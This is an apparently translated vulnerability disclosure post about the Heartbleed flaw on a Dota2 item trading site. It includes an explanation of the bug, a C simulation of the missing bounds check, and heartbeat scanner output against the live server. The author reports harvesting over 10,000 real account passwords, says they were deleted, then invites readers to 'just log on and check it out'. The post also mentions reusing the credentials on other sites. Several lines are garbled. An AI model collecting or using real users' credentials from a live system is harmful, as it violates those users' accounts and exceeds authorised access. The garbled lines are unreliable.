Improper O&M at the Dota2 jewelry trading market exposes usernames, passwords and cookies (10 K+ account passwords were collected)
Improper O&M at the Dota2 jewelry trading market leaks usernames, passwords and cookies (the 10 K+ account passwords collected were deleted after testing)
As the title says: the main site of the Dota2 jewelry trading market, http://www.dota2sp.com/, is affected by Heartbleed, which leaks usernames, passwords and cookies in plaintext... This vulnerability may cause further harm (for example, the usernames and passwords could be used for dictionary tests on mainstream Chinese websites; the accounts contain cash, weapons and equipment...). Although I have not played games for N years .. --
The Heartbleed vulnerability (Heartbleed bug) is a programming error in the encryption library OpenSSL. It was first disclosed in April 2014. This library is widely used to implement the Transport Layer Security (TLS) protocol on the Internet. Whenever a defective OpenSSL version is in use, both servers and clients can be attacked. The problem occurs because input is not properly validated (a bounds check is missing) in the implementation of the TLS heartbeat extension [3]. The vulnerability's name therefore comes from "heartbeat" [4]. The error is a buffer over-read [5], that is, more data can be read than should be allowed [6].
(Source: wiki)
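The missing bounds check described above, as an added example (not code from the original post and not OpenSSL's code): a simplified handler for the RFC 6520 heartbeat message layout, with the length check switchable so both behaviours can be compared. The function names, the arena layout and the marker string are constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HB_REQUEST  1
#define HB_RESPONSE 2
#define HB_PADDING  16  /* RFC 6520: at least 16 bytes of padding */

/* Hypothetical simplified handler, not OpenSSL's code.
 * rec = type(1) | payload_length(2) | payload | padding, rec_len bytes received.
 * Returns payload bytes echoed into out, or -1 if the message is discarded. */
long hb_respond(const uint8_t *rec, size_t rec_len,
                uint8_t *out, size_t out_cap, int check_bounds)
{
    if (rec_len < 3 || rec[0] != HB_REQUEST) return -1;
    size_t claimed = ((size_t)rec[1] << 8) | rec[2];   /* sender-controlled */
    /* The check that was missing: claimed length must fit the received record. */
    if (check_bounds && 1 + 2 + claimed + HB_PADDING > rec_len) return -1;
    if (3 + claimed > out_cap) return -1;
    out[0] = HB_RESPONSE; out[1] = rec[1]; out[2] = rec[2];
    memcpy(out + 3, rec + 3, claimed);   /* trusts claimed, not rec_len */
    return (long)claimed;
}

/* Constructed demo: a 23-byte record that claims 64 payload bytes, followed in
 * the same arena by unrelated data standing in for adjacent process memory.
 * Returns 1 if that neighbouring data shows up in the response. */
int leaks_neighbor(int check_bounds)
{
    static const char marker[] = "Password=CONSTRUCTED-SAMPLE";
    const size_t mlen = sizeof marker - 1, rec_len = 3 + 4 + HB_PADDING;
    uint8_t arena[128] = {0}, out[128];
    arena[0] = HB_REQUEST; arena[1] = 0x00; arena[2] = 0x40;
    memcpy(arena + 3, "ping", 4);
    memcpy(arena + rec_len, marker, mlen);
    long n = hb_respond(arena, rec_len, out, sizeof out, check_bounds);
    for (long i = 0; n > 0 && i + (long)mlen <= n; i++)
        if (memcmp(out + 3 + i, marker, mlen) == 0) return 1;
    return 0;
}

int main(void)
{
    printf("without check: leak=%d\n", leaks_neighbor(0));
    printf("with check:    leak=%d\n", leaks_neighbor(1));
    return 0;
}
```

With the check enabled, an honest request whose claimed length matches its payload is still answered; only records whose claimed length exceeds what was received are dropped.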
...
First, the test output...
Scanning www.dota2sp.com on port 443
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 4757
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Server TLS version was 1.2
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
WARNING: server www.dota2sp.com returned more data than it should - server is vulnerable!
10 K+ account passwords were collected for the test. (vim already exists. Review it here.
However, you must first use sort.
(The collected account passwords have been deleted)
Just log on and check it out.
Solution:
Fix the issue ....
Do you have a gift...
.. Notify users to change their passwords